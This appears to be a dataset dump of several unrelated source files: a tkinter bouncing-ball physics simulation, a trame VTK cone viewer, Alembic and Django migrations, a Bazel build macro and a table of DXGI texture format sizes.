It includes physics and mechanics-related concepts such as gravity, air resistance, and collision.
Before the start of the simulation, the program prompts the user to enter a value for gravity and
air density. If you do not want to enter a value, please click on cancel or the window's exit button
and the default values are going to be applied (9.8 m/s^2 for gravity and 1.225 kg/m^3 for air density).
If a vacuum setting is preferred, please enter 0 for both windows.
by Jing Han Sun
Updated September 21, 2020
'''
import tkinter as tk
from tkinter import simpledialog
import random
import math
import sys
class Visual(tk.Tk):
    '''This is the main class that will run the simulation'''
    #define width and height for window
    HEIGHT = 500
    WIDTH = 500
    #define a list of colors for the balls
    colors = ['#FF4325', '#E72020', #red
              '#FF9333', #orange
              '#FEFA5F', #yellow
              '#89F45E', '#9DFFA7', '#278A2A', #green
              '#6A8EFF', '#A8E5F9', '#1FFBF8', '#3253F4', '#2A438B', #blue
              '#67419E', '#C280FF', '#E12FE1', '#F1BFFC', #purple
              '#FCBFE9', '#FC22A0' #pink
              ]

    def __init__(self, argv):
        super().__init__()
        #create canvas
        self.canvas = tk.Canvas(self, width = self.WIDTH, height = self.HEIGHT, bg = 'white')
        self.canvas.pack()
        self.update()
        #window title
        self.title('Bouncing Balls')
        #add label
        self.label = tk.Label(self, text = 'Welcome!')
        self.label.pack()
        #add quit button
        #BUG FIX: pass the bound method itself. The original used
        #`command = self.quit()`, which called quit() immediately during
        #construction and left the button's command set to None.
        self.button = tk.Button(self, text = "Quit", fg = 'red', command = self.quit)
        self.button.configure(width = 10, activebackground = "#33B5E5", relief = tk.FLAT)
        #self.button_window = self.canvas.create_window(10, 10, anchor = tk.NW , window = self.button)
        self.button.pack()
        self.update()
        #create dictionary to store info about circles (radius, dir_x, dir_y)
        self.circles_id = {}
        # ask the user to enter a value for gravity
        gravity = simpledialog.askfloat("Input", "Please enter a value for gravity (e.g.: 9.8)")
        if gravity is None:
            # use Earth's gravitational constant if no value is entered
            gravity = 9.8
        air_density = simpledialog.askfloat("Input", "Please enter a value for air density (e.g.: 1.225)")
        if air_density is None:
            # use the air density at STP if no value is entered
            air_density = 1.225
        for i in range(6):
            #set up a random radius
            radius = random.randint(20, 30)
            #set up a random initial center for each circle
            cx = random.randint(radius + 10, self.WIDTH - radius - 10)
            cy = random.randint(radius + 10, self.HEIGHT - radius - 10)
            #set up a random initial direction for each circle
            dir_x = random.randint(-10, 10)
            dir_y = random.randint(-10, 10)
            #create the circle
            ids = self.canvas.create_oval(cx - radius, cy - radius,
                                          cx + radius, cy + radius,
                                          fill = random.choice(self.colors), outline = 'black')
            #fill each list for each ball's characteristics
            #circles_id = {ids: [radius, dir_x, dir_y]}
            self.circles_id[ids] = [radius, dir_x, dir_y]
        #boolean that returns true if 2 balls overlap
        self.overlaps = False
        #actual animation
        #NOTE(review): this loop never returns, so a caller's mainloop()
        #is never reached; rendering is driven by canvas.update() calls.
        while True:
            self.move_circles()
            #if it hits a wall
            self.bounce()
            self.collision()
            self.gravity(gravity)
            self.air_resistance(air_density)

    def center(self, circle):
        '''Get the center coordinates of a given ball'''
        x0, y0, x1, y1 = self.canvas.coords(circle)
        x = (x0 + x1) / 2
        y = (y0 + y1) / 2
        return x, y

    def distance(self, circle1, circle2):
        '''Get the distance between the center of 2 given balls'''
        x1, y1 = self.center(circle1)
        x2, y2 = self.center(circle2)
        return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)

    def theta(self, x, y):
        '''Get the angle in radians (between 0 and 2pi) of a ball's movement using its x and y directions'''
        #first and fourth quadrant
        if x > 0:
            if y > 0:
                return math.atan(y / x)
            else:
                return math.atan(y / x) + 2 * math.pi
        #second and third quadrant
        elif x < 0:
            return math.atan(y / x) + math.pi
        # x = 0 is undefined for arctan
        else:
            if y > 0:
                return math.pi/2
            else:
                return 3 * math.pi/2

    def overlap(self):
        '''Return True if 2 balls overlap in the canvas'''
        #NOTE(review): self.overlaps is never reset to False, so once set
        #it stays True for the rest of the run — confirm this is intended.
        for circle1 in self.circles_id:
            for circle2 in self.circles_id:
                if circle1 != circle2 and \
                        self.distance(circle1, circle2) <= \
                        (self.circles_id.get(circle1)[0] + self.circles_id.get(circle2)[0]):
                    self.overlaps = True
        return self.overlaps

    def move_circles(self):
        '''Movement of the balls in the frame using the generated direction for each ball'''
        for i in self.circles_id:
            dir_x = self.circles_id.get(i)[1]
            dir_y = self.circles_id.get(i)[2]
            self.canvas.move(i, dir_x, dir_y)
            self.canvas.update()

    def bounce(self):
        '''When a ball hits one of the 4 borders of the window, it bounces off according to their initial hit angle'''
        # x and y directions for a given ball
        for i in self.circles_id:
            dir_x = self.circles_id.get(i)[1]
            dir_y = self.circles_id.get(i)[2]
            #retrieve the initial coordinates of the ball
            x0, y0, x1, y1 = self.canvas.coords(i)
            #if it hits the left or right wall, reverse the x direction
            if x0 <= 10 or x1 >= self.WIDTH - 10:
                dir_x = -dir_x
                # update the x direction in the direction list to continue moving
                self.circles_id.get(i)[1] = dir_x
                #while x0 <= 0 or x1 >= self.SIZE:
                self.canvas.move(i, dir_x, dir_y)
                self.canvas.update()
            #if it hits the top or bottom wall, reverse the y direction
            if y0 <= 10 or y1 >= self.HEIGHT - 10:
                dir_y = -dir_y
                #update the y direction in the direction list to continue moving
                self.circles_id.get(i)[2] = dir_y
                #while y0 <= 0 or y1 >= self.SIZE:
                self.canvas.move(i, dir_x, dir_y)
                self.canvas.update()

    def collision(self):
        '''Check for collisions between 2 balls in the canvas. When 2 balls collide, they will bounce away as an elastic
        collision while conserving their momentum within the system involved'''
        for circle1 in self.circles_id:
            for circle2 in self.circles_id:
                #check if the distance between 2 distinct balls is smaller than the sum of their radius
                #if yes, it means collision
                #give a bit of space for collision to avoid bug when overlapping
                if -12 < self.distance(circle1, circle2) - \
                        (self.circles_id.get(circle1)[0] + self.circles_id.get(circle2)[0]) <= 0\
                        and circle1 != circle2:
                    #define initial x and y directions
                    x1 = self.circles_id.get(circle1)[1]
                    y1 = self.circles_id.get(circle1)[2]
                    x2 = self.circles_id.get(circle2)[1]
                    y2 = self.circles_id.get(circle2)[2]
                    #assume each ball weighs its radius squared with density pi^-1
                    m1 = (self.circles_id.get(circle1)[0]) ** 2
                    m2 = (self.circles_id.get(circle2)[0]) ** 2
                    #define initial speeds using the x and y directions
                    v1 = math.sqrt(x1 ** 2 + y1 ** 2)
                    v2 = math.sqrt(x2 ** 2 + y2 ** 2)
                    #define initial movement angles
                    theta1 = self.theta(x1, y1)
                    theta2 = self.theta(x2, y2)
                    #define the contact angle of the balls right before collision
                    phi = theta2 - theta1
                    # pi = pf (conservation of momentum)
                    #calculate the final x and y velocities after the collision
                    #source for the formula: https://en.wikipedia.org/wiki/Elastic_collision
                    x1 = ((v1 * math.cos(theta1 - phi) * (m1 - m2)) + 2 * m2 * v2 * math.cos(theta2 - phi)) \
                        * (math.cos(phi) / (m1 + m2)) + v1 * math.sin(theta1 - phi) * math.cos(phi + math.pi/2)
                    y1 = ((v1 * math.cos(theta1 - phi) * (m1 - m2)) + 2 * m2 * v2 * math.cos(theta2 - phi)) \
                        * (math.sin(phi) / (m1 + m2)) + v1 * math.sin(theta1 - phi) * math.sin(phi + math.pi/2)
                    x2 = ((v2 * math.cos(theta2 - phi) * (m2 - m1)) + 2 * m1 * v1 * math.cos(theta1 - phi)) \
                        * (math.cos(phi) / (m1 + m2)) + v2 * math.sin(theta2 - phi) * math.cos(phi + math.pi/2)
                    y2 = ((v2 * math.cos(theta2 - phi) * (m2 - m1)) + 2 * m1 * v1 * math.cos(theta1 - phi)) \
                        * (math.sin(phi) / (m1 + m2)) + v2 * math.sin(theta2 - phi) * math.sin(phi + math.pi/2)
                    #update the circles dictionary to make them continue moving after the collision
                    self.circles_id.get(circle1)[1] = x1
                    self.circles_id.get(circle1)[2] = y1
                    self.circles_id.get(circle2)[1] = x2
                    self.circles_id.get(circle2)[2] = y2
                    self.canvas.move(circle1, x1, y1)
                    self.canvas.move(circle2, x2, y2)
                    self.canvas.update()
                    #avoid pushing the ball out of the canvas when the collision happens near the canvas border
                    self.bounce()

    def gravity(self, a):
        '''Adds some gravity to the balls which attracts them to the ground'''
        for i in self.circles_id:
            vy = self.circles_id.get(i)[2]
            #kinematic equation: (vf = vi + a * t) to apply the acceleration to the velocity
            vy = vy + a / 5
            #update the y velocity after applying gravity
            self.circles_id.get(i)[2] = vy
        # avoid pushing the ball out of the canvas when the collision happens near the canvas border
        self.bounce()

    def air_resistance(self, air_density):
        '''Adds some air resistance to the balls which slows their motion'''
        for i in self.circles_id:
            vx = self.circles_id.get(i)[1]
            vy = self.circles_id.get(i)[2]
            m = (self.circles_id.get(i)[0]) ** 2 / 1000
            cd = 1.05 #drag coefficient of a cube
            area = (self.circles_id.get(i)[0] / 1000) ** 2 * math.pi
            #calculate the air resistance
            #source for the formula: https://www.softschools.com/formulas/physics/air_resistance_formula/85/
            fx = (air_density * cd * area * vx ** 2) / 2
            fy = (air_density * cd * area * vy ** 2) / 2
            #calculate the acceleration
            ax = fx / m
            ay = fy / m
            # kinematic equation: (vf = vi + a * t) to apply the acceleration to the velocity
            vx = vx + ax / 5
            vy = vy + ay / 5
            # update the velocities after applying drag
            self.circles_id.get(i)[1] = vx
            self.circles_id.get(i)[2] = vy
        # avoid pushing the ball out of the canvas when the collision happens near the canvas border
        self.bounce()

    def drag(self):
        #BUG FIX: bind a callable. The original bound the *result* of
        #calling self.move_circles(), i.e. None, so the drag binding did
        #nothing; tkinter passes the event object to the callback.
        self.canvas.bind('<B1-Motion>', lambda event: self.move_circles())
# Build the simulation window, forwarding any command-line arguments.
if __name__ == '__main__':
    Visual(sys.argv[1:]).mainloop()
| 12,371 | 3,882 |
from trame.app import get_server
from trame.widgets import vtk, trame, vuetify
from trame.ui.vuetify import SinglePageLayout
# -----------------------------------------------------------------------------
# Trame setup
# -----------------------------------------------------------------------------
# Shared trame server plus shortcuts to its reactive state and controller.
server = get_server()
state, ctrl = server.state, server.controller
def reset_resolution():
    """Restore the cone resolution slider to its default value (6)."""
    state.resolution = 6
# -----------------------------------------------------------------------------
# UI setup
# -----------------------------------------------------------------------------
# Single-page UI: toolbar with a resolution slider and the VTK view area.
layout = SinglePageLayout(server)
with layout:
    # Validate client life cycle
    trame.LifeCycleMonitor(events=("['created']",))
    layout.icon.click = ctrl.reset_camera
    layout.title.set_text("Cone")
    layout.toolbar.dense = True
    # Toolbar
    with layout.toolbar as toolbar:
        vuetify.VSpacer()
        # Slider bound to the shared "resolution" state (default 6)
        vuetify.VSlider(
            hide_details=True,
            v_model=("resolution", 6),
            max=60,
            min=3,
            step=1,
            style="max-width: 300px;",
        )
        # Toggle the Vuetify dark theme
        vuetify.VSwitch(
            hide_details=True,
            v_model=("$vuetify.theme.dark",),
        )
        # Undo button restoring the default resolution
        with vuetify.VBtn(icon=True, click=reset_resolution):
            vuetify.VIcon("mdi-undo")
    with layout.content:
        with vuetify.VContainer(fluid=True, classes="pa-0 fill-height"):
            with vtk.VtkView() as view:
                ctrl.reset_camera = view.reset_camera
                with vtk.VtkGeometryRepresentation():
                    # Cone source whose resolution tracks the slider state
                    vtk.VtkAlgorithm(
                        vtkClass="vtkConeSource", state=("{ resolution }",)
                    )
# -----------------------------------------------------------------------------
# start server
# -----------------------------------------------------------------------------
if __name__ == "__main__":
server.start()
| 1,935 | 522 |
"""nobadges
Revision ID: 4d998c6ec630
Revises: 7950a35f5dbd
Create Date: 2020-05-04 11:55:22.475532
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4d998c6ec630'
down_revision = '7950a35f5dbd'
branch_labels = None
depends_on = None
def upgrade():
    """Apply the migration: drop the 'badges' column from 'account'."""
    with op.batch_alter_table('account') as batch:
        batch.drop_column('badges')
def downgrade():
    """Revert the migration: restore the nullable TEXT 'badges' column."""
    with op.batch_alter_table('account') as batch:
        batch.add_column(sa.Column('badges', sa.TEXT(), nullable=True))
| 752 | 300 |
# Generated by Django 2.1.15 on 2021-01-26 08:59
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the 'idea_opinion' field from the 'opinions' model."""

    # Must run after the migration that created the Opinions model.
    dependencies = [
        ('app', '0002_opinions'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='opinions',
            name='idea_opinion',
        ),
    ]
| 323 | 118 |
def library(name, hdrs=[], srcs=[], deps=[], test_deps=[]):
    """Declare a cc_library plus a matching cc_test target.

    The library exports "<name>.h" (plus any extra hdrs); the test
    compiles "<name>_test.cc" and links against the library and //:catch.
    """
    native.cc_library(
        name = name,
        hdrs = [name + ".h"] + hdrs,
        srcs = srcs,
        deps = deps,
    )
    native.cc_test(
        name = name + "_test",
        srcs = [name + "_test.cc"],
        deps = test_deps + [":" + name, "//:catch"],
        # presumably Catch's "show durations" flag — TODO confirm
        args = ["-d=yes"],
    )
| 325 | 142 |
# BPP and block sizes for all DXGI formats
# Since dxgi formats are enumerated from 0 onward there is no need for dictionary
# for formats that are not suitable for storage, the value is set to 0
# Sizes are in BYTES
# Indexed by the DXGI_FORMAT enum value; entry is the size in BYTES of one
# pixel (uncompressed formats) or one block (BC-compressed formats).
dxgi_pixel_or_block_size = [
    0,
    16, 16, 16, 16,
    12, 12, 12, 12,
    8, 8, 8, 8, 8, 8,
    8, 8, 8, 8,
    8, 8, 8, 8,
    4, 4, 4, 4,
    4, 4, 4, 4, 4, 4,
    4, 4, 4, 4, 4, 4,
    4, 4, 4, 4, 4,
    4,
    4, 4, 4,
    2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
    1, 1, 1, 1, 1, 1,
    0, # DXGI_FORMAT_R1_UNORM ehm >.< ( TODO )
    4, 4, 4,
    8, 8, 8, # BC1
    16, 16, 16, # BC2
    16, 16, 16, # BC3
    8, 8, 8, # BC4
    16, 16, 16, # BC5
    2, 2,
    4, 4, 4, 4, 4, 4, 4,
    16, 16, 16, # BC6
    16, 16, 16, # BC7
    # TODO Complete the rest
]
# DXGI_FORMAT enum values that are block-compressed (the BC entries above).
dxgi_compressed_formats = [
    70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84,
    94, 95, 96, 97, 98, 99
] | 859 | 578 |